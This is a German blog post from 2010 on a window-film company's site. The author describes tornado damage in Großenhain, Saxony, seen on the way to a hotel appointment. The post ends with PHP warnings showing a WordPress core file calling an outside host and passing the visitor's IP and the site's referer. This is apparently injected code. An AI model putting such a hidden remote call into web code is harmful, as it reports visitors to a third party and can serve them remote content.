Folien vom Fachmann

Folien – Sonnenschutz, Mattierungs-, Sicht- u. Blendschutz sowie Beamer- und einbruchhemmende Folien …

Tornado in Großenhain / Sachsen

Donnerstag 27. Mai 2010 von admin

Der Schaden den der Tornado in Großenhain, im Landkreis Meissen, des Bundeslandes  Sachsen am Pfingstmontag, dem 24.05.2010 hinterlassen hatte konnte ich heute, am Tag drei nach dem Unwetter, mit eigenen Augen  sehen.

Ich hatte heute einen Kundentermin betreffs Matratzenreinigung im Großenhainer Hotel auf dem Kupferberg. Schon auf der Fahrt nach Großenhain kommt man nicht umhin zu sehen, wo der Tornado gewütet hat. Komplette Waldbereiche wurden entwurzelt, Straßenschilder, Ampelanlagen, Beregnungsanlagen und nicht definierbare Wrackteile lagen verstreut umher. Am Ortseingang sieht man an einem Wohnblock die Spuren der Verwüstung (Hier der Link zu einem YouTube Video).

Der Weg zum Hotel Kupferberg führt durch einen Wald. Dieser ist entlang der Zufahrt beidseitig durch entwurzelte und abgebrochene Bäume kaum passierbar. Erfurchtsvoll durchfuhr ich diesen Waldbereich und hoffte recht bald mein Ziel, das Hotel zu erreichen. Wie durch ein Wunder hat das Hotel, deren Gäste und Mittarbeiter(innen) kaum Schaden genommen. Nur ein paar Meter rechts und links vom Hotel liegen mächtige Bäume entwurzelt oder geköpft umher. Diese lagen am Pfingstmontag noch auf der Zufahrt, welche nun wieder passierbar ist. Überall im Ort sieht man Dachdecker, Feuerwehr und Freiwillige an der Beseitigung der Schäden. Schockiert von den Naturgewalten und der Zerstörungskraft von Tornados erledigte ich meine Arbeit im Hotel und hoffe das den betroffenen Menschen schnell geholfen wird und diese das Erlebte verarbeiten können.

Ich habe auf der Hin- und Rückfahrt ein paar Schnappschüsse mit meinem Handy gemacht, welche die Verwüstung durch den Tornado zeigen.

Diese können Sie hier sehen.

Wer den Geschädigten eine Spende zukommen lassen möchte, findet unten den Link zum Spendenkonto.

Spendenkonto der Stadtverwaltung Großenhain für die Betroffenen des Tornados

Teilen und Spass haben: Diese Icons verlinken auf Bookmark Dienste bei denen Nutzer neue Inhalte finden und mit anderen teilen können.
  • MisterWong
  • Y!GG
  • Webnews
  • Facebook
  • Wikio
  • Digg
  • email
  • del.icio.us
  • Linkarchiv

[Post to Twitter] In Twitter publizieren 

Dieser Beitrag wurde erstellt am Donnerstag 27. Mai 2010 um 17:40 und abgelegt unter Sachsen. Kommentare zu diesen Eintrag im RSS 2.0 Feed. Kommentare und Pings sind derzeit nicht erlaubt.

Kommentare sind geschlossen.


Warning: file_get_contents() [function.file-get-contents]: Zugriff via http:// ist ab bplaced pro gegeben. Mehr Infos unter: https://www.bplaced.net/pro in /users/sisofol/www/blog/wp-includes/general-template.php on line 61

Warning: file_get_contents(http://24365online.com/_YTG_yu/_dl/get_info.php?host=www.fensterveredelung.de&referer=&visitor_ip=34.228.41.66) [function.file-get-contents]: failed to open stream: no suitable wrapper could be found in /users/sisofol/www/blog/wp-includes/general-template.php on line 61

In Twitter publizieren links powered by Tweet This v1.4.1, a WordPress plugin for Twitter.